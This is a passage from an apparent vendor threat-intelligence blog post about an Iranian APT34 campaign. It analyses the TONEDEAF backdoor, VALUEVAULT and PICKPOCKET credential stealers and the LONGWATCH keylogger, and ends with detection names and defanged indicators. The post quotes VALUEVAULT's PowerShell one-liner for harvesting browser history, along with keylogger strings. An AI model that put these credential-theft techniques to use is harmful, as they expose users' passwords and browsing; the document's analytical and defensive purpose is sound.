FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.

VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.

Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.

PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.

Conclusion

The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.

We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.

Malware Appendix

TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.


Figure 5: Snippet of code from TONEDEAF binary

Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.

VALUEVAULT

VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.

powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials

Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.


Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database

VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.

C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/new_edge.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/mozila.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/main.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/ie.go
C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

Figure 8: Golang files extracted during execution of VALUEVAULT

LONGWATCH

FireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

Interesting strings identified in the binary are shown in Figure 9.

GetAsyncKeyState
>---------------------------------------------------\n\n
c:\\windows\\temp\\log.txt
[ENTER]
[CapsLock]
[CRTL]
[PAGE_UP]
[PAGE_DOWN]
[HOME]
[LEFT]
[RIGHT]
[DOWN]
[PRINT]
[PRINT SCREEN] (1 space)
[INSERT]
[SLEEP]
[PAUSE]
\n---------------CLIPBOARD------------\n
\n\n >>>  (2 spaces)
c:\\windows\\temp\\log.txt

Figure 9: Strings identified in a LONGWATCH binary

Detecting the Techniques

FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34 activity.

Signature Name

FE_APT_Keylogger_Win_LONGWATCH_1

FE_APT_Keylogger_Win_LONGWATCH_2

FE_APT_Keylogger_Win32_LONGWATCH_1

FE_APT_HackTool_Win_PICKPOCKET_1

FE_APT_Trojan_Win32_VALUEVAULT_1

FE_APT_Backdoor_Win32_TONEDEAF

TONEDEAF BACKDOOR [DNS]

TONEDEAF BACKDOOR [upload]

TONEDEAF BACKDOOR [URI]

Table 1: FireEye Platform Detections

Endpoint Indicators

Indicator

MD5 Hash (if applicable)

Code Family

System.doc

b338baa673ac007d7af54075ea69660b

TONEDEAF

 

50fb09d53c856dcd0782e1470eaeae35

TONEDEAF

ERFT-Details.xls

96feed478c347d4b95a8224de26a1b2c

TONEDEAF DROPPER

 

caf418cbf6a9c4e93e79d4714d5d3b87

TONEDEAF DROPPER

b.exe

9fff498b78d9498b33e08b892148135f

VALUEVAULT

WindowsNTProgram.exe

021a0f57fe09116a43c27e5133a57a0a

LONGWATCH

PE86.dll

d8abe843db508048b4d4db748f92a103

PICKPOCKET

PE64.dll

6eca9c2b7cf12c247032aae28419319e

PICKPOCKET

Table 2: APT34 Endpoint Indicators from this blog post

Network Indicators

hxxp[://]www[.]cam-research-ac[.]com

offlineearthquake[.]com

c[.]cdn-edge-akamai[.]com

185[.]15[.]247[.]154

Acknowledgements

A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.